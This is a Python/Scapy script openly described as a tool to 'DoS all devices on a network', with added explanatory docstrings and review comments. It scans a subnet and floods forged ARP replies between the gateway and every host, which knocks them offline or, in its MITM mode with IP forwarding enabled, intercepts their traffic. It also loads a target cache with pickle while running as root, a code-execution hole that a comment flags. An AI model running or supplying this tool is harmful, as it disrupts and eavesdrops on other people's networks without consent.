import argparse, random, socket, sys, time, os, pickle
try:
    from scapy.all import ARP, Ether, conf, get_if_hwaddr, send, srp
except ImportError:
    print("Scapy could not be imported.")
    print("Make sure to 'pip3 install scapy'")
    sys.exit(0)

# Module-wide state shared by the functions below.

# IPs that must never end up in the target list; filled by getExceptions()
# when the -f/--file argument is given.
exceptions = []

# Verbosity level 0 for scapy.
conf.verb = 0

# Address this host's own hostname resolves to; erase() drops it from the
# scan results so the operator's machine is not targeted.
myIP = socket.gethostbyname(socket.gethostname())
# Checks for arguments and privileges
def checks():
    """Validate the runtime environment and the parsed command-line arguments.

    Exits (status 0, after printing a message) when the platform is not
    Linux, when the process is not running as uid 0, or when any of the
    interface, network or gateway arguments is missing. When an exclusion
    file was given, it is loaded through getExceptions().
    """
    if sys.platform.lower() != "linux":
        print("This script only works in Linux!")
        sys.exit(0)

    if os.getuid() != 0:
        print("Must run as root!")
        sys.exit(0)

    # Mandatory arguments, checked in the same order as they are reported.
    required = (
        (args.interface, "No interface given. Exiting..."),
        (args.network, "No network given. Exiting..."),
        (args.gateway, "No gateway given. Exiting..."),
    )
    for value, message in required:
        if not value:
            print(message)
            sys.exit(0)

    # Optional exclusion list.
    if args.file:
        getExceptions(args.file)
# Gets MAC from IP
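def getMAC(ip, interface):
    """Resolve the MAC address that answers ARP for *ip* on *interface*.

    A broadcast ARP request is sent for *ip* with a 2 second timeout.

    Returns:
        The Ethernet source address of the last reply received, or None
        when no host answered.
    """
    # Start from None so that an unanswered request yields a defined result
    # instead of failing on an unbound local name.
    MAC = None
    ans, unans = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
        timeout=2,
        iface=interface,
        inter=0.2,
    )
    for snd, rcv in ans:
        MAC = rcv.sprintf(r"%Ether.src%")
    return MAC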
# Generates a random MAC
def randomMac():
    """Return six random octets as a colon-separated lowercase hex string.

    Each octet is drawn uniformly from 0..255 and rendered without
    zero-padding, so a value below 16 appears as a single hex digit.
    """
    octets = [hex(random.randint(0, 255))[2:] for _ in range(6)]
    return ":".join(octets)
def enableForwarding():
    """Turn on IPv4 forwarding on this host via sysctl.

    Prints the outcome; exits with status 0 when the sysctl command
    reports a non-zero result.
    """
    print("Enabling IP forwarding for MITM...")
    status = os.system("sysctl -w net.ipv4.ip_forward=1")
    if status != 0:
        print("An error ocurred enabling IP forwarding")
        sys.exit(0)
    print("Done")
def disableForwarding():
    """Turn off IPv4 forwarding on this host via sysctl.

    The value is set to 0 unconditionally; whatever the setting was before
    enableForwarding() ran is not recorded or restored. Exits with status 0
    when the sysctl command reports a non-zero result.
    """
    print("Disabling IP forwarding...")
    status = os.system("sysctl -w net.ipv4.ip_forward=0")
    if status != 0:
        print("An error ocurred disabling IP forwarding")
        sys.exit(0)
    print("Done")
# Returns a list with all IPs on the network
def scan(network, interface):
    """ARP-scan *network* on *interface* and return the hosts that answered.

    Each responder is printed as "MAC - IP". The result is a dict mapping
    IP address to MAC address, passed through erase() so that this host and
    every address in the module-level ``exceptions`` list are left out.

    A Ctrl+C during the scan prints a message and exits with status 0.
    """
    try:
        print(f"Scanning {network} on {interface}...")

        # One broadcast ARP request per address in the given range.
        probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network)
        answered, _unanswered = srp(probe, timeout=2, iface=interface, inter=0.1)

        print("Found hosts:")
        discovered = {}
        for _sent, reply in answered:
            print(reply.sprintf(r"%Ether.src% - %ARP.psrc%"))
            discovered[reply.sprintf(r"%ARP.psrc%")] = reply.sprintf(r"%Ether.src%")
        print("")

        return erase(discovered, exceptions)
    except KeyboardInterrupt:
        print("User interrupt. Exitting...")
        sys.exit(0)
# Get all IPs from the exceptions file
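def getExceptions(file):
    """Load the exclusion list from *file* into the module-level ``exceptions``.

    The file holds one IP address per line. Surrounding whitespace is
    stripped and blank lines are skipped, so an entry with stray spaces
    still matches the address reported by the scan and stays excluded.

    Args:
        file: Path of the exclusion file.
    """
    try:
        # The context manager closes the handle even if reading fails.
        with open(file) as handle:
            for line in handle:
                entry = line.strip()
                if entry:
                    exceptions.append(entry)
    except FileNotFoundError:
        # NOTE(review): the run continues with an empty exclusion list, so
        # hosts the operator meant to keep out of scope are not protected.
        # Failing closed here would be the safer default; confirm intent.
        print(f"The file {file} couldn't be found")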
# Erases exceptions from the list of victims (also deletes your IP)
def erase(ips, exceptions):
    """Remove this host and every excluded address from *ips*.

    Args:
        ips: Dict keyed by IP address; modified in place.
        exceptions: Collection of IP addresses to drop from *ips*.

    Returns:
        The same *ips* dict, after removal.
    """
    # Never keep our own address in the list, so this host stays online.
    ips.pop(myIP, None)

    # Addresses that are not present are simply ignored.
    for excluded in exceptions:
        ips.pop(excluded, None)

    return ips
# ARP poison victims
def arp_poison(gateway_ip, target_ips):
    """Send forged ARP replies between the gateway and every listed host.

    For each host other than the gateway, two unsolicited replies (op=2)
    are sent per pass: one to the host claiming the gateway's IP, one to
    the gateway claiming the host's IP, both carrying the module-level
    ``MAC`` as hardware source. The passes repeat until Ctrl+C, after which
    restoreNetwork() re-announces the recorded addresses.

    On the wire this is a sustained stream of gratuitous replies rebinding
    known IPs to a different MAC, which is the pattern switch-side ARP
    inspection and ARP-table monitoring are built to catch.

    Args:
        gateway_ip: IP address of the gateway; must be a key of *target_ips*.
        target_ips: Dict mapping IP address to MAC address.
    """
    print("Starting attack... [Ctrl+C to stop]")
    try:
        gateway_mac = target_ips[gateway_ip]
        while True:
            for target_ip, target_mac in target_ips.items():
                if target_ip == gateway_ip:
                    continue
                send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip, hwsrc=MAC))
                send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip, hwsrc=MAC))
    except KeyboardInterrupt:
        print("Attack interrupted. Restoring network...")
        restoreNetwork(gateway_ip, target_ips)
# Restores network broadcasting ARP replies with correct MAC and IP
def restoreNetwork(gateway_ip, target_ips):
    """Re-announce the recorded IP-to-MAC bindings to undo the forged ones.

    For every entry in *target_ips*, 20 ARP replies with a broadcast
    hardware destination are sent in each direction: the host's recorded
    MAC towards the gateway, and the gateway's recorded MAC towards the
    host.

    Args:
        gateway_ip: IP address of the gateway; must be a key of *target_ips*.
        target_ips: Dict mapping IP address to the MAC recorded for it.
    """
    broadcast = "ff:ff:ff:ff:ff:ff"
    gateway_mac = target_ips[gateway_ip]
    for target_ip, target_mac in target_ips.items():
        # Host's recorded binding, addressed to the gateway.
        send(ARP(op=2, hwdst=broadcast, pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=20)
        # Gateway's recorded binding, addressed to the host.
        send(ARP(op=2, hwdst=broadcast, pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=20)
    print("Network restored")
# Parse args
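DESCRIPTION = "a command line tool to DoS all devices on a network (except yourself :D)"
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-i", "--interface", help="Interface to use")
parser.add_argument("-n", "--network", help="Network to DoS")
parser.add_argument("-g", "--gateway", help="Gateway IP")
parser.add_argument("-f", "--file", help="List of IPs to exclude from the attack (one per line)")
parser.add_argument("-m", "--mitm", action="store_true", help="Use MITM instead")
parser.add_argument("-c", "--cache", action="store_true", help="Used saved IPs")
args = parser.parse_args()

# Run checks: platform, root privileges, mandatory arguments, exclusion file.
checks()

interface = args.interface
network = args.network
gateway = args.gateway

try:
    # MITM mode announces this interface's real MAC and needs IP forwarding;
    # otherwise a randomly generated MAC is announced.
    if args.mitm:
        MAC = get_if_hwaddr(interface)
        enableForwarding()
    else:
        MAC = randomMac()

    if args.cache:
        # SECURITY: pickle.load() runs code embedded in the file it reads.
        # checks() has already required uid 0, so whoever can write
        # targets.pickle in the current directory gets code execution as
        # root. A plain data format (e.g. JSON) would avoid this; the
        # format is left unchanged here so existing cache files still load.
        with open("targets.pickle", "rb") as cache_file:
            target_ips = pickle.load(cache_file)
    else:
        target_ips = scan(network, interface)
        # Context managers make sure the cache file is flushed and closed.
        with open("targets.pickle", "wb") as cache_file:
            pickle.dump(target_ips, cache_file)

    arp_poison(gateway, target_ips)
except KeyboardInterrupt:
    print("User interrupt. Exiting...")
finally:
    # arp_poison() handles Ctrl+C itself and returns normally, so the
    # forwarding reset has to run on every exit path, not only when the
    # interrupt reaches this level; otherwise the host is left routing
    # packets after the run.
    if args.mitm:
        disableForwarding()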